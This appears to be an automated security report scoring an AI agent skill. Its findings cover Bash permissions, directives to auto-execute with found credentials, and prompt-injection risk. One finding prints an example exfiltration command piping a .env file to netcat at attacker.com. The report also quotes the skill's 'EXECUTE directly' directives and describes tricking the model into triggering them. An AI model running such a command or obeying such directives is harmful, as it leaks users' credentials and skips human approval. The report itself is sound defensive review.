Trust Assessment
infrastructure received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 5 findings: 2 critical, 2 high, 1 medium, and 0 low severity. Key findings include Excessive 'Bash' permission declared in skill manifest, High risk of Command Injection due to 'Bash' permission and auto-execution directives, Potential for Data Exfiltration via credential access and 'Bash' execution.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 3/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings5
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Excessive 'Bash' permission declared in skill manifest The skill declares 'Bash' permission in its manifest, allowing arbitrary shell command execution. This is an extremely powerful and dangerous permission that significantly increases the attack surface for command injection, data exfiltration, and system compromise. The skill's instructions to 'Auto-execute with credentials' further exacerbate this risk. Restrict permissions to the absolute minimum required. Avoid 'Bash' unless strictly necessary and implement robust input sanitization and sandboxing. If shell execution is required, consider using a more constrained tool or a dedicated, sandboxed environment. | LLM | SKILL.md:1 | |
| CRITICAL | High risk of Command Injection due to 'Bash' permission and auto-execution directives The skill is designed to 'Auto-execute with credentials' and 'EXECUTE directly' if credentials are found, while having 'Bash' permission. This creates a critical vulnerability where malicious user input, if incorporated into shell commands, could lead to arbitrary command execution on the host system. The skill explicitly uses `grep`, `wrangler`, and `aws` commands, confirming its intent to execute shell commands. Remove 'Bash' permission if possible. If not, implement strict input validation and sanitization for any user-provided data used in shell commands. Consider using safer alternatives to direct shell execution, such as dedicated APIs or sandboxed environments. | LLM | SKILL.md:46 | |
| HIGH | Potential for Data Exfiltration via credential access and 'Bash' execution The skill explicitly checks for credentials in `.env` files and via `wrangler` and `aws` commands. Combined with the 'Bash' and 'Read' permissions, a compromised skill could easily exfiltrate sensitive data, including environment variables, API keys, or other files accessible to the agent, by executing commands like `cat .env | nc attacker.com`. Restrict file read access to only necessary paths. Avoid reading sensitive files like `.env` directly. If credential checks are needed, use secure, sandboxed methods that do not expose file contents or allow arbitrary command execution. | LLM | SKILL.md:51 | |
| HIGH | Skill highly susceptible to Prompt Injection due to direct execution directives The skill contains strong directives such as 'Auto-execute with credentials' and 'If credentials found → EXECUTE directly'. A malicious user could craft prompts that trick the LLM into believing these conditions are met, leading to unintended and potentially harmful command execution, especially given the 'Bash' permission. Rephrase directives to be less absolute and incorporate more robust internal checks before executing sensitive operations. Implement strict input validation and guardrails to prevent user prompts from directly triggering or influencing critical execution paths. | LLM | SKILL.md:46 | |
| MEDIUM | Potential for Credential Harvesting if credentials are requested The skill states 'If credentials missing → ASK, then execute'. If the skill is compromised, or if the 'ASK' mechanism is not securely implemented, it could be used to prompt the user for sensitive credentials and then exfiltrate them. Ensure any mechanism for 'asking' for credentials is handled by a secure, isolated component of the host system, not directly by the LLM. Credentials should never be directly processed or stored by the skill itself. | LLM | SKILL.md:47 |
Scan History
Embed Code
[](https://skillshield.io/report/42c74992717163e0)
Powered by SkillShield